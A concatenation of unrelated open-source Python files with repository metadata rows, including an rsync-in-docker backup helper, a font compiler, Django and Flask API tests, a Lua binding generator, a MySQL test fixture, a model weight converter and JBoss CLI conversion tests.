# specify remote shell program explicitly (i.e. ssh as opposed
# to the default rsh)
"-e", ssh_cmd,
# preserve file permissions
"--perms",
# delete destination files not in source
"--delete",
# print overall progress
"--info=progress2",
# preserve timestamps
"--times",
from_path,
to_path
]
if relative:
cmd.append("--relative")
logging.debug("Running rsync in docker with: " + " ".join(cmd))
logging.debug("Volume mapping: " + str(volumes))
container = self.client.containers.run("instrumentisto/rsync-ssh",
command=cmd, volumes=volumes,
detach=True)
try:
log_from_docker(container)
container.reload()
code = container.attrs["State"]["ExitCode"]
if code != 0:
raise RsyncError(code, container)
except KeyboardInterrupt as e:
logging.warning("Stopping container " + container.name)
container.stop()
raise e
finally:
container.remove()
def _run_rsync_with_restart(self, volumes, from_path, to_path, relative,
restarts=5):
attempts = 1
done = False
while not done:
try:
self._run_rsync(volumes, from_path, to_path, relative=relative)
done = True
except RsyncError as e:
print(str(e), flush=True)
attempts += 1
if attempts > restarts:
raise Exception("rsync failed too many times")
print("trying again... {}/{}".format(attempts, restarts),
flush=True)
def _get_volume_args(self, local_volume, volume_mode):
mounted_volume = join("/", local_volume)
return {
"bb8_ssh": {"bind": "/root/.ssh", "mode": "ro"},
local_volume: {"bind": mounted_volume, "mode": volume_mode}
}
# local_volume can be an absolute path or a named volume
def backup_volume(self, local_volume, remote_path):
volumes = self._get_volume_args(local_volume, "ro")
logging.info("Backing up to {} from {}".format(remote_path,
local_volume))
self._run_rsync_with_restart(volumes, local_volume, remote_path,
relative=True)
def restore_volume(self, local_volume, remote_path):
mounted_volume = join("/", local_volume)
volumes = self._get_volume_args(local_volume, "rw")
remote_path = "{}{}/".format(remote_path, local_volume)
logging.info("Restoring from {} to {}".format(remote_path,
local_volume))
self._run_rsync_with_restart(volumes, remote_path, mounted_volume,
relative=False)
class RsyncError(Exception):
def __init__(self, code, container):
super().__init__("Rsync failed with code {}".format(code))
self.code = code
self.container = container
| 36.276786 | 79 | 0.537288 | 3,912 | 0.962835 | 0 | 0 | 0 | 0 | 0 | 0 | 893 | 0.219788 |
25d56f5b093e66a6e34a5f01df8b3463c937cd78 | 1,537 | py | Python | Tools/fontcompile.py | aunicornfarmer/gotris | 6c125071d5add7fc71716ecbb08474c607561555 | [
"MIT"
] | 63 | 2015-01-03T04:19:23.000Z | 2021-07-19T22:33:16.000Z | Tools/fontcompile.py | aunicornfarmer/gotris | 6c125071d5add7fc71716ecbb08474c607561555 | [
"MIT"
] | 1 | 2015-09-14T08:55:40.000Z | 2018-01-23T08:56:47.000Z | Tools/fontcompile.py | aunicornfarmer/gotris | 6c125071d5add7fc71716ecbb08474c607561555 | [
"MIT"
] | 28 | 2015-02-23T10:31:05.000Z | 2021-06-18T12:33:51.000Z | #!/usr/bin/python
# -*- coding: utf-8 -*-
# compiled font is a binary blob:
# 1. magic (MFNT) - 4 bytes
# 2. number of symbols - 4 bytes
# 3. font y advance - 4 bytes
# 4. an array of glyphs (offset_x, offset_y, width, height, tx, ty, tx2, ty2, x_advance) - 36 * number of symbols
# (iiIIffffI)
# 5. png texture
import sys
import struct
import os
from xml2obj import xml2obj
def print_usage_and_exit():
print "usage: {0} <UNPACKED FONT>".format(sys.argv[0])
sys.exit(1)
if len(sys.argv) != 2:
print_usage_and_exit()
fontfile = sys.argv[1]
if not os.path.exists(fontfile):
print_usage_and_exit()
glyphs = []
with file(fontfile + ".fontdef.xml", 'r') as f:
xmlobj = xml2obj(f.read())
font_y_advance = int(xmlobj.height)
for g in xmlobj.glyph:
glyphs.append((unicode(g.symbol), int(g.offset_x), int(g.offset_y), int(g.width), int(g.height), float(g.tx), float(g.ty), float(g.tx2), float(g.ty2), int(g.x_advance)))
with file(fontfile[:-4] + ".font", 'w') as f:
f.write("MFNT")
f.write(struct.pack("<I", len(glyphs)))
f.write(struct.pack("<I", font_y_advance))
for g in glyphs:
f.write(struct.pack("<iiIIffffI", g[1], g[2], g[3], g[4], g[5], g[6], g[7], g[8], g[9]))
unicode_fontcp = []
for i, g in enumerate(glyphs):
unicode_fontcp.append((g[0], i+1))
def unicode_fontcp_key(item):
return item[0]
unicode_fontcp.sort(key=unicode_fontcp_key)
for entry in unicode_fontcp:
f.write(struct.pack("<II", ord(entry[0]), entry[1]))
with file(fontfile, 'r') as imgf:
imgdata = imgf.read()
f.write(imgdata)
| 25.616667 | 170 | 0.666233 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 395 | 0.256994 |
25d797d0aac6f91f0e9c9a706f99ce479f5d3726 | 2,047 | py | Python | trojsten/login/tests.py | MvonK/web | b701a6ea8fb6f0bdfb720e66d0a430db13db8bff | [
"MIT"
] | 5 | 2018-04-22T22:44:02.000Z | 2021-04-26T20:44:44.000Z | trojsten/login/tests.py | MvonK/web | b701a6ea8fb6f0bdfb720e66d0a430db13db8bff | [
"MIT"
] | 250 | 2018-04-24T12:04:11.000Z | 2022-03-09T06:56:47.000Z | trojsten/login/tests.py | MvonK/web | b701a6ea8fb6f0bdfb720e66d0a430db13db8bff | [
"MIT"
] | 8 | 2019-04-28T11:33:03.000Z | 2022-02-26T13:30:36.000Z | import json
from django.conf import settings
from django.test import TestCase, override_settings
from django.urls import reverse
from trojsten.people.models import User
@override_settings(SITE_ID=10, ROOT_URLCONF="trojsten.urls.login")
class LoginViewsTests(TestCase):
fixtures = ["sites.json"]
def test_login_root_view_no_login(self):
url = reverse("login_root_view")
response = self.client.get(url, follow=True)
self.assertRedirects(response, "{}?next=/".format(settings.LOGIN_URL))
def test_login_root_view_login(self):
u = User.objects.create()
self.client.force_login(u)
url = reverse("login_root_view")
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
@override_settings(SITE_ID=10, ROOT_URLCONF="trojsten.urls.login")
class ApiTests(TestCase):
fixtures = ["sites.json"]
def setUp(self):
self.user = User.objects.create_user(
username="jozko",
first_name="Jozko",
last_name="Mrkvicka",
email="jozko@mrkvicka.com",
password="pass",
graduation=47,
)
def test_current_user_info(self):
self.client.force_login(self.user)
response = self.client.get("/api/me").data
self.assertEquals(response["id"], self.user.id)
self.assertEquals(response["username"], self.user.username)
self.assertEquals(response["email"], self.user.email)
def test_current_user_info_not_logged_in(self):
response = self.client.get("/api/me").data
self.assertEquals(response["detail"].code, "not_authenticated")
def test_is_authenticated(self):
self.client.force_login(self.user)
response = json.loads(self.client.get("/api/checklogin").content)
self.assertTrue(response["authenticated"])
def test_is_authenticated_not_logged_in(self):
response = json.loads(self.client.get("/api/checklogin").content)
self.assertFalse(response["authenticated"])
| 31.015152 | 78 | 0.6766 | 1,736 | 0.84807 | 0 | 0 | 1,870 | 0.913532 | 0 | 0 | 291 | 0.142159 |
25d8b8019030143e754283529c1bc631afb398f3 | 3,735 | py | Python | gen_bindings.py | mpeterv/emlua | f1c63ae111afba5ccd771e8c1d090af305eebea1 | [
"MIT"
] | 2 | 2016-08-25T16:00:56.000Z | 2021-02-07T03:29:10.000Z | gen_bindings.py | mpeterv/emlua | f1c63ae111afba5ccd771e8c1d090af305eebea1 | [
"MIT"
] | 1 | 2016-08-26T14:57:07.000Z | 2016-08-30T08:49:55.000Z | gen_bindings.py | mpeterv/emlua | f1c63ae111afba5ccd771e8c1d090af305eebea1 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import collections
import re
def write_constants(out, lua_version):
out.write("EMSCRIPTEN_KEEPALIVE\n")
out.write("emlua_constant emlua_constants[] = {\n")
with open("lists/lua5{}/constants".format(lua_version)) as constants_file:
for line in constants_file:
constant_name = line.rstrip()
out.write('{{"{}", {}}},\n'.format(constant_name, constant_name))
out.write("};\n")
c_js_types = {
"void": "null",
"int": "number",
"char": "number",
"long": "number",
"size_t": "number",
"char *": "string",
"lua_State *": "state",
"lua_Alloc": "number",
"lua_CFunction": "number",
"lua_KFunction": "number",
"lua_Reader": "number",
"lua_Writer": "number",
"lua_Hook": "number",
"lua_Integer": "number",
"lua_Number": "number",
"lua_Unsigned": "number",
"lua_KContext": "number"
}
def get_js_type(c_type):
if c_type.startswith("const "):
c_type = c_type[len("const "):]
if c_type in c_js_types:
return c_js_types[c_type]
if c_type.endswith("*"):
return "number"
class Function(object):
def __init__(self, function_line):
line_match = re.match(r"^(.*\W)(\w+)\s*\((.*)\);$", function_line)
self._ret_type = line_match.group(1).strip()
js_ret_type = get_js_type(self._ret_type)
self._name = line_match.group(2)
self._full_args = line_match.group(3)
self._js_types = [js_ret_type]
self._arg_names = []
for typed_arg in self._full_args.split(", "):
if typed_arg == "void":
break
elif typed_arg == "..." or typed_arg.endswith("[]"):
self.supported = False
return
arg_match = re.match(r"^(.*\W)(\w+)$", typed_arg)
js_arg_type = get_js_type(arg_match.group(1).strip())
self._js_types.append(js_arg_type)
self._arg_names.append(arg_match.group(2))
self.supported = True
def append_to_function_list(self, out):
out.write('{{"{}", "{}"}},\n'.format(self._name, " ".join(self._js_types)))
def write_emlua_function(self, out):
out.write("EMSCRIPTEN_KEEPALIVE\n")
out.write("{} em{}({}) {{\n".format(self._ret_type, self._name, self._full_args))
if self._ret_type == "void":
out.write(" {}({});\n".format(self._name, ", ".join(self._arg_names)))
else:
out.write(" return {}({});\n".format(self._name, ", ".join(self._arg_names)))
out.write("}\n")
def write_functions(out, lua_version):
out.write("emlua_function emlua_functions[] = {\n")
functions = []
with open("lists/lua5{}/functions".format(lua_version)) as functions_file:
for line in functions_file:
function = Function(line.rstrip())
if function.supported:
functions.append(function)
function.append_to_function_list(out)
out.write("};\n")
for function in functions:
function.write_emlua_function(out)
def write_bindings(out, lua_version):
out.write("#if LUA_VERSION_NUM == 50{}\n".format(lua_version))
write_constants(out, lua_version)
write_functions(out, lua_version)
out.write("#endif\n")
def main():
with open("emlua_bindings.c", "w") as out:
out.write("/* Generated by ./gen_bindings.py. */\n")
out.write("#include <emscripten.h>\n")
out.write('#include "lua.h"\n')
out.write('#include "lualib.h"\n')
out.write('#include "lauxlib.h"\n')
for lua_version in ["1", "2", "3"]:
write_bindings(out, lua_version)
if __name__ == "__main__":
main()
| 30.867769 | 90 | 0.587952 | 1,456 | 0.389826 | 0 | 0 | 0 | 0 | 0 | 0 | 937 | 0.25087 |
25da3c1cb459bcee6395b9dfd94dc5a75175e53c | 3,183 | py | Python | fixtures/db.py | maxteplyakov/learn_python_test_automation | de40804d58ada5f4165ca6a0070bfb4cfca038d9 | [
"MIT"
] | null | null | null | fixtures/db.py | maxteplyakov/learn_python_test_automation | de40804d58ada5f4165ca6a0070bfb4cfca038d9 | [
"MIT"
] | null | null | null | fixtures/db.py | maxteplyakov/learn_python_test_automation | de40804d58ada5f4165ca6a0070bfb4cfca038d9 | [
"MIT"
] | null | null | null | import mysql.connector
from models.group import Group
from models.contact import Contact
class DbFixture():
def __init__(self, host, name, user, password):
self.host = host
self.name = name
self.user = user
self.password = password
self.connection = mysql.connector.connect(
host=host, database=name, user=user, password=password,
autocommit=True
)
def get_group_list(self):
list = []
cursor = self.connection.cursor()
try:
cursor.execute(
"SELECT group_id, group_name, group_header, group_footer "
"FROM group_list"
)
for row in cursor:
(id, name, header, footer) = row
list.append(
Group(id=str(id), name=name, header=header, footer=footer)
)
finally:
cursor.close()
return list
def get_group_by_id(self, id):
group = None
cursor = self.connection.cursor()
try:
cursor.execute(
"SELECT group_id, group_name, group_header, group_footer "
"FROM group_list "
f"WHERE group_id={id}"
)
# group = Group(id=str(id), name=name, header=header, footer=footer)
for row in cursor:
(id, name, header, footer) = row
group = Group(
id=str(id), name=name, header=header, footer=footer
)
finally:
cursor.close()
return group
def get_contact_list(self):
list = []
cursor = self.connection.cursor()
try:
cursor.execute(
"SELECT id, firstname, lastname, address, email "
"FROM addressbook "
"WHERE deprecated='0000-00-00 00:00:00'"
)
for row in cursor:
(id, firstname, lastname, address, email) = row
list.append(
Contact(
id=str(id),
first_name=firstname,
last_name=lastname,
address=address,
email1=email
)
)
finally:
cursor.close()
return list
def get_contact_by_id(self, id):
contact = None
cursor = self.connection.cursor()
try:
cursor.execute(
"SELECT id, firstname, lastname, address, email "
"FROM addressbook "
"WHERE deprecated='0000-00-00 00:00:00' AND id=%s" % id
)
for row in cursor:
(id, firstname, lastname, address, email) = row
contact = Contact(
id=str(id),
first_name=firstname,
last_name=lastname,
address=address,
email1=email
)
finally:
cursor.close()
return contact
def destroy(self):
self.connection.close()
| 30.902913 | 80 | 0.473767 | 3,090 | 0.970782 | 0 | 0 | 0 | 0 | 0 | 0 | 467 | 0.146717 |
25db68b1e4b300ed7435559d769a87a914307b00 | 1,171 | py | Python | app/tests/support/test_views.py | Valaraucoo/raven | 0157e193baf569be9479a78838dc26d77a11a99d | [
"BSD-3-Clause"
] | 3 | 2020-12-27T21:52:52.000Z | 2021-08-23T10:26:10.000Z | app/tests/support/test_views.py | Valaraucoo/raven | 0157e193baf569be9479a78838dc26d77a11a99d | [
"BSD-3-Clause"
] | 12 | 2020-12-22T22:36:28.000Z | 2021-01-18T13:39:34.000Z | app/tests/support/test_views.py | Valaraucoo/raven | 0157e193baf569be9479a78838dc26d77a11a99d | [
"BSD-3-Clause"
] | 2 | 2020-12-27T21:52:39.000Z | 2021-11-18T08:08:25.000Z | import pytest
from django.urls import reverse
from tests.users import factories as users_factories
@pytest.mark.django_db
class TestTicketCreateView:
def test_get(self,client):
url = reverse('support:support-contact')
response = client.get(url)
assert response.status_code == 200
def test_post(self,client):
url = reverse('support:support-contact')
response = client.post(url)
assert response.status_code == 200
user = users_factories.StudentFactory()
data = {
"email": user.email,
"category": '1',
"fullname": f'{user.first_name} {user.last_name}',
"description": "problem"
}
response = client.post(url, data=data)
assert response.status_code == 200
data['category'] = '2'
response = client.post(url, data=data)
assert response.status_code == 200
data['category'] = '3'
response = client.post(url, data=data)
assert response.status_code == 200
data['category'] = '0'
response = client.post(url, data=data)
assert response.status_code == 200
| 26.022222 | 62 | 0.608027 | 1,045 | 0.8924 | 0 | 0 | 1,068 | 0.912041 | 0 | 0 | 178 | 0.152007 |
25dbcc8ad9f17eebc5ce137f97fcdf06a4148e19 | 1,827 | py | Python | lc0415_add_strings.py | bowen0701/python-algorithms-data-structures | e625f59a9fc59e4728825078d4434a7968a724e5 | [
"BSD-2-Clause"
] | 8 | 2019-03-18T06:37:24.000Z | 2022-01-30T07:50:58.000Z | lc0415_add_strings.py | bowen0701/python-algorithms-data-structures | e625f59a9fc59e4728825078d4434a7968a724e5 | [
"BSD-2-Clause"
] | null | null | null | lc0415_add_strings.py | bowen0701/python-algorithms-data-structures | e625f59a9fc59e4728825078d4434a7968a724e5 | [
"BSD-2-Clause"
] | null | null | null | """Leetcode 415. Add Strings
Easy
URL: https://leetcode.com/problems/add-strings/
Given two non-negative integers num1 and num2 represented as string,
return the sum of num1 and num2.
Note:
- The length of both num1 and num2 is < 5100.
- Both num1 and num2 contains only digits 0-9.
- Both num1 and num2 does not contain any leading zero.
- You must not use any built-in BigInteger library or convert the inputs to
integer directly.
"""
class SolutionPaddingAddBackwardIter(object):
def _padding(self, num1, num2):
n1, n2 = len(num1), len(num2)
if n1 < n2:
num1 = '0' * (n2 - n1) + num1
elif n1 > n2:
num2 = '0' * (n1 - n2) + num2
return num1, num2
def addStrings(self, num1, num2):
"""
:type num1: str
:type num2: str
:rtype: str
Time complexity: O(n).
Space complexity: O(1).
"""
from collections import deque
# Pad shorter num with leading zeros to string of equal length.
num1, num2 = self._padding(num1, num2)
# Start with carry 0, add digits of num1 & num2 from backward to array.
sum_arr = deque([])
i = len(num1) - 1
carry = 0
while i >= 0 or carry > 0:
if i >= 0:
val = int(num1[i]) + int(num2[i]) + carry
else:
val = carry
carry, val = val // 10, val % 10
sum_arr.appendleft(str(val))
i -= 1
return ''.join(list(sum_arr))
def main():
# Output: 807.
num1 = '342'
num2 = '465'
print SolutionPaddingAddBackwardIter().addStrings(num1, num2)
# Output: 10110.
num1 = '9999'
num2 = '111'
print SolutionPaddingAddBackwardIter().addStrings(num1, num2)
if __name__ == '__main__':
main()
| 25.027397 | 79 | 0.571429 | 1,086 | 0.594417 | 0 | 0 | 0 | 0 | 0 | 0 | 792 | 0.433498 |
25dbd0ea80f4dcc92776fe99c6632dc557ac3ea6 | 4,574 | py | Python | tests/version2/test_users.py | SimonAwiti/Questioner-APIs | 514de4fd3af1726b7f89525c6bfaaed230842853 | [
"MIT"
] | null | null | null | tests/version2/test_users.py | SimonAwiti/Questioner-APIs | 514de4fd3af1726b7f89525c6bfaaed230842853 | [
"MIT"
] | 2 | 2019-01-15T16:02:32.000Z | 2019-01-23T03:32:29.000Z | tests/version2/test_users.py | SimonAwiti/Questioner-APIs | 514de4fd3af1726b7f89525c6bfaaed230842853 | [
"MIT"
] | 1 | 2019-01-13T23:39:06.000Z | 2019-01-13T23:39:06.000Z | """Tests for handling the users resource"""
import unittest
import json
from app import create_app
from app.API.utilities.database import connection
class UserTestCase(unittest.TestCase):
"""Unit testiing for the user regsitration endpoint"""
def setUp(self):
"""Initialize the app and database connections"""
self.app = create_app(config_name="testing")
self.client = self.app.test_client
self.user = {
"firstname" : "Ken",
"lastname" : "joseph",
"email" : "mysecret12@gmail.com",
"password" : "jos@Aeph12",
"confirm" : "jos@Aeph12",
}
self.user2 = {
"firstname" : "simon",
"lastname" : "jose",
"email" : "myseuuret12@gmail.com",
"password" : "joseph12",
}
self.user3 = {
"firstname" : "Ken",
"lastname" : "joseph",
"email" : "mysecret12@gmail.com",
"password" : "jo@Aeph12",
"confirm" : "jo@Aeph12",
}
self.user4 = {
"firstname" : "Ken",
"lastname" : "joseph",
"email" : "mysecret12gmail.com",
"password" : "jo@Aeph12",
"confirm" : "jo@Aeph12",
}
self.user5 = {
"firstname" : "Ken",
"lastname" : "joseph",
"email" : "mysecret12@gmail.com",
"password" : "josAeph12",
"confirm" : "jos@Aeph12",
}
with self.app.app_context():
connection.initializedb()
def create_user(self):
response = self.client().post('/api/v2/users/auth/register',
data=json.dumps(self.user),
content_type='application/json')
def tearDown(self):
"""Drops all tables after tests are done"""
with self.app.app_context():
connection.dbconnection()
connection.drop_tables()
def test_user_register(self):
"""Test to successfuly register a new user reg"""
response = self.client().post('/api/v2/users/auth/register',
data=json.dumps(self.user),
content_type='application/json')
#self.assertEqual(response.status_code, 201)
#self.assertIn('User Successfully Created', str(response.data))
def test_user_login(self):
"""Successfully log into the app"""
self.create_user()
response = self.client().post('/api/v2/users/auth/login',
data=json.dumps(self.user),
content_type='application/json')
#self.assertEqual(response.status_code, 200)
#self.assertIn('User Successfully logged in', str(response.data))
def test_login_wrong_passwords(self):
"""Tests for checking if password match"""
response = self.client().post(
'/api/v2/users/auth/login',
data=json.dumps(self.user2),
content_type='application/json')
#self.assertEqual(response.status_code, 401)
#self.assertIn("Error logging in, credentials not found", str(response.data))
def test_add_user_who_exists(self):
"""Tests for adding a new user who exists"""
self.create_user()
response = self.client().post(
'/api/v2/users/auth/register',
data=json.dumps(self.user),
content_type='application/json'
)
#self.assertEqual(response.status_code, 409)
#self.assertIn("There is a user with the same email registere", str(response.data))
def test_add_user_with_poor_email(self):
"""Tests for adding a new user with poor email"""
response = self.client().post(
'/api/v2/users/auth/register',
data=json.dumps(self.user4),
content_type='application/json'
)
#self.assertEqual(response.status_code, 401)
#self.assertIn("Invalid email provided", str(response.data))
def test_add_user_with_diff_pass(self):
"""Tests for adding a new user with diff password"""
response = self.client().post(
'/api/v2/users/auth/register',
data=json.dumps(self.user5),
content_type='application/json'
)
#self.assertEqual(response.status_code, 401)
#self.assertIn("Passwords do not match", str(response.data))
| 37.491803 | 91 | 0.547879 | 4,413 | 0.964801 | 0 | 0 | 0 | 0 | 0 | 0 | 1,966 | 0.429821 |
25dc5429f2b771a96edd402c569bf140dac7fc33 | 3,268 | py | Python | maskrcnn_benchmark/utils/big_model_loading.py | microsoft/GLIP | fd52c6361f013e70ae7682d90b3ab3ca2bd5e6bc | [
"MIT"
] | 295 | 2021-12-08T02:22:27.000Z | 2022-03-31T22:27:10.000Z | maskrcnn_benchmark/utils/big_model_loading.py | microsoft/GLIP | fd52c6361f013e70ae7682d90b3ab3ca2bd5e6bc | [
"MIT"
] | 1 | 2021-12-14T08:09:13.000Z | 2022-03-17T03:53:19.000Z | maskrcnn_benchmark/utils/big_model_loading.py | microsoft/GLIP | fd52c6361f013e70ae7682d90b3ab3ca2bd5e6bc | [
"MIT"
] | 9 | 2021-12-09T00:33:25.000Z | 2022-03-17T11:57:42.000Z | import numpy as np
import torch
import torch.nn as nn
from collections import OrderedDict
def tf2th(conv_weights):
"""Possibly convert HWIO to OIHW."""
if conv_weights.ndim == 4:
conv_weights = conv_weights.transpose([3, 2, 0, 1])
return torch.from_numpy(conv_weights)
def _rename_conv_weights_for_deformable_conv_layers(state_dict, cfg):
import re
layer_keys = sorted(state_dict.keys())
for ix, stage_with_dcn in enumerate(cfg.MODEL.RESNETS.STAGE_WITH_DCN, 1):
if not stage_with_dcn:
continue
for old_key in layer_keys:
pattern = ".*block{}.*conv2.*".format(ix)
r = re.match(pattern, old_key)
if r is None:
continue
for param in ["weight", "bias"]:
if old_key.find(param) is -1:
continue
if 'unit01' in old_key:
continue
new_key = old_key.replace(
"conv2.{}".format(param), "conv2.conv.{}".format(param)
)
print("pattern: {}, old_key: {}, new_key: {}".format(
pattern, old_key, new_key
))
# Calculate SD conv weight
w = state_dict[old_key]
v, m = torch.var_mean(w, dim=[1, 2, 3], keepdim=True, unbiased=False)
w = (w - m) / torch.sqrt(v + 1e-10)
state_dict[new_key] = w
del state_dict[old_key]
return state_dict
def load_big_format(cfg, f):
model = OrderedDict()
weights = np.load(f)
cmap = {'a':1, 'b':2, 'c':3}
for key, val in weights.items():
old_key = key.replace('resnet/', '')
if 'root_block' in old_key:
new_key = 'root.conv.weight'
elif '/proj/standardized_conv2d/kernel' in old_key:
key_pattern = old_key.replace('/proj/standardized_conv2d/kernel', '').replace('resnet/', '')
bname, uname, cidx = key_pattern.split('/')
new_key = '{}.downsample.{}.conv{}.weight'.format(bname,uname,cmap[cidx])
elif '/standardized_conv2d/kernel' in old_key:
key_pattern = old_key.replace('/standardized_conv2d/kernel', '').replace('resnet/', '')
bname, uname, cidx = key_pattern.split('/')
new_key = '{}.{}.conv{}.weight'.format(bname,uname,cmap[cidx])
elif '/group_norm/gamma' in old_key:
key_pattern = old_key.replace('/group_norm/gamma', '').replace('resnet/', '')
bname, uname, cidx = key_pattern.split('/')
new_key = '{}.{}.gn{}.weight'.format(bname,uname,cmap[cidx])
elif '/group_norm/beta' in old_key:
key_pattern = old_key.replace('/group_norm/beta', '').replace('resnet/', '')
bname, uname, cidx = key_pattern.split('/')
new_key = '{}.{}.gn{}.bias'.format(bname,uname,cmap[cidx])
else:
print('Unknown key {}'.format(old_key))
continue
print('Map {} -> {}'.format(key, new_key))
model[new_key] = tf2th(val)
model = _rename_conv_weights_for_deformable_conv_layers(model, cfg)
return dict(model=model)
| 40.345679 | 105 | 0.549266 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 602 | 0.184211 |
25dd5361b6b0dc7b073414ddb1a152c255756063 | 10,975 | py | Python | convert/test_convert.py | mikewatkins-new/jboss_call_api | 690179b60c0b9574d0951a1cb57ffdb6eaca8943 | [
"MIT"
] | null | null | null | convert/test_convert.py | mikewatkins-new/jboss_call_api | 690179b60c0b9574d0951a1cb57ffdb6eaca8943 | [
"MIT"
] | 1 | 2021-06-02T00:39:33.000Z | 2021-06-02T00:39:33.000Z | convert/test_convert.py | mikewatkins-new/jboss_call_api | 690179b60c0b9574d0951a1cb57ffdb6eaca8943 | [
"MIT"
] | null | null | null | import unittest
from convert import jboss_command_to_http_request
class TestJBOSSCommandToHTTPGETRequestOperationOnlyTestCase(unittest.TestCase):
"""Test case for JBOSS CLI commands operation only commands using HTTP GET"""
def test_no_path_one_operations_no_params_http_get(self):
"""See if we only operations without params return correctly using HTTP GET"""
test_data = ':read-resource'
desired_operation = {"operation": "resource"}
result = jboss_command_to_http_request(test_data, "GET")
self.assertEqual(result, desired_operation)
def test_no_path_only_operations_empty_params_http_get(self):
"""See if only operations with empty params return correctly using HTTP GET"""
test_data = ':read-resource()'
desired_operation = {"operation": "resource"}
result = jboss_command_to_http_request(test_data, "GET")
self.assertEqual(result, desired_operation)
def test_no_path_only_operations_single_param_http_get(self):
""" See if only operations with single parameter return correctly using HTTP GET"""
test_data = ':read-resource(attributes-only=true)'
desired_operation = {"operation": "resource", "attributes-only": "true"}
result = jboss_command_to_http_request(test_data, "GET")
self.assertEqual(result, desired_operation)
def test_no_path_only_operations_multiple_params_http_get(self):
"""See if only operations with multiple params return correctly using HTTP GET"""
test_data = ':read-attribute(include-defaults=true,name=uuid)'
desired_operation = {"operation": "attribute", "include-defaults": "true", "name": "uuid"}
result = jboss_command_to_http_request(test_data, "GET")
self.assertEqual(result, desired_operation)
class TestJBOSSCommandToHTTPPOSTRequestOperationOnlyTestCase(unittest.TestCase):
"""Test case for JBOSS CLI commands operation only commands using HTTP POST"""
def test_no_path_one_operations_no_params_http_post(self):
"""See if we only operations without params return correctly using HTTP POST"""
test_data = ':read-resource'
desired_operation = {"operation": "read-resource"}
result = jboss_command_to_http_request(test_data, "POST")
self.assertEqual(result, desired_operation)
def test_no_path_only_operations_empty_params_http_post(self):
"""See if only operations with empty params return correctly using HTTP POST"""
test_data = ':read-resource()'
desired_operation = {"operation": "read-resource"}
result = jboss_command_to_http_request(test_data, "POST")
self.assertEqual(result, desired_operation)
def test_no_path_only_operations_single_param_http_post(self):
"""See if only operations with single parameter return correctly using HTTP POST"""
test_data = ':read-attribute(name=server-state)'
desired_operation = {"operation": "read-attribute", "name": "server-state"}
result = jboss_command_to_http_request(test_data, "POST")
self.assertEqual(result, desired_operation)
def test_no_path_only_operations_multiple_params_http_post(self):
"""See if only operations with multiple params return correctly using HTTP POST"""
test_data = ':read-operation-description(name=whoami,access-control=true)'
desired_operation = {"operation": "read-operation-description", "name": "whoami", "access-control": "true"}
result = jboss_command_to_http_request(test_data, "POST")
self.assertEqual(result, desired_operation)
class TTestJBOSSCommandToHTTPGETRequestTestCase(unittest.TestCase):
"""Test case for for convert.jboss_command_to_http_request"""
def test_single_path_and_operation_no_params_http_get(self):
"""See if command with path and operation returns correctly using HTTP GET"""
test_data = '/subsystem=undertow:read-resource'
desired_operation = {"operation": "resource", "address": "/subsystem/undertow"}
result = jboss_command_to_http_request(test_data, "GET")
self.assertEqual(result, desired_operation)
def test_single_path_and_operation_single_param_http_get(self):
"""See if command with path, operation, and single param return correctly using HTTP GET"""
test_data = '/subsystem=undertow:read-attribute(resolve-expressions=true)'
desired_operation = {
"operation": "attribute", "resolve-expressions": "true", "address": "/subsystem/undertow"
}
result = jboss_command_to_http_request(test_data, "GET")
self.assertEqual(result, desired_operation)
def test_single_path_and_operation_multiple_params_http_get(self):
"""See if command with path, operation, and multiple params return correctlty using HTTP GET"""
test_data = '/subsystem=undertow:read-attribute(resolve-expressions=true,name=instance-id)'
desired_operation = {
"operation": "attribute", "resolve-expressions": "true", "name": "instance-id",
"address": "/subsystem/undertow"
}
result = jboss_command_to_http_request(test_data, "GET")
self.assertEqual(result, desired_operation)
def test_multiple_path_and_operation_no_params_http_get(self):
"""See if command with path, operation, and single param return correctly using HTTP GET"""
test_data = '/subsystem=undertow/server=default-server:read-resource'
desired_operation = {"operation": "resource", "address": "/subsystem/undertow/server/default-server"}
result = jboss_command_to_http_request(test_data, "GET")
self.assertEqual(result, desired_operation)
def test_multiple_path_and_operation_empty_params_http_get(self):
"""See if command with path, operation, and single param return correctly using HTTP GET"""
test_data = '/subsystem=undertow/server=default-server:read-resource()'
desired_operation = {"operation": "resource", "address": "/subsystem/undertow/server/default-server"}
result = jboss_command_to_http_request(test_data, "GET")
self.assertEqual(result, desired_operation)
def test_multiple_path_and_operation_single_param_http_get(self):
"""See if command with path, operation, and single param return correctly using HTTP GET"""
test_data = '/subsystem=undertow/server=default-server:read-attribute(name=default-host)'
desired_operation = {
"operation": "attribute", "name": "default-host",
"address": "/subsystem/undertow/server/default-server"
}
result = jboss_command_to_http_request(test_data, "GET")
self.assertEqual(result, desired_operation)
def test_multiple_path_and_operation_multiple_param_http_get(self):
"""See if command with multiple pathresult, operation, and multiple param return correctly using HTTP GET"""
test_data = '/subsystem=undertow/server=default-server:read-attribute(resolve-expressions=true,include-defaults=true,name=servlet-container)'
desired_operation = {
"operation": "attribute", "resolve-expressions": "true", "include-defaults": "true",
"name": "servlet-container", "address": "/subsystem/undertow/server/default-server"
}
result = jboss_command_to_http_request(test_data, "GET")
self.assertEqual(result, desired_operation)
class TestJBOSSCommandToHTTPPOSTRequestTestCase(unittest.TestCase):
"""Test case for for convert.jboss_command_to_http_request"""
def test_single_path_and_operation_no_params_http_post(self):
"""See if command with path and operation returns correctly using HTTP POST"""
test_data = '/core-service=management:whoami'
desired_operation = {"operation": "whoami", "address": ["core-service", "management"]}
result = jboss_command_to_http_request(test_data, "POST")
self.assertEqual(result, desired_operation)
def test_single_path_and_operation_single_param_http_post(self):
"""See if command with path, operation, and single param return correctly using HTTP POST"""
test_data = '/core-service=server-environment:path-info(unit=GIGABYTES)'
desired_operation = {
"operation": "path-info", "unit": "GIGABYTES",
"address": ["core-service", "server-environment"]
}
result = jboss_command_to_http_request(test_data, "POST")
self.assertEqual(result, desired_operation)
def test_single_path_and_operation_multiple_params_http_post(self):
"""See if command with path, operation, and multiple params return correctly using HTTP POST"""
test_data = '/subsystem=undertow:write-attribute(name=statistics-enabled,value=true)'
desired_operation = {
"operation": "write-attribute", "name": "statistics-enabled", "value": "true",
"address": ["subsystem", "undertow"]
}
result = jboss_command_to_http_request(test_data, "POST")
self.assertEqual(result, desired_operation)
def test_multiple_path_and_operation_no_params_http_post(self):
"""See if command with multiple pathresult, operation, and single param return correctly using HTTP POST"""
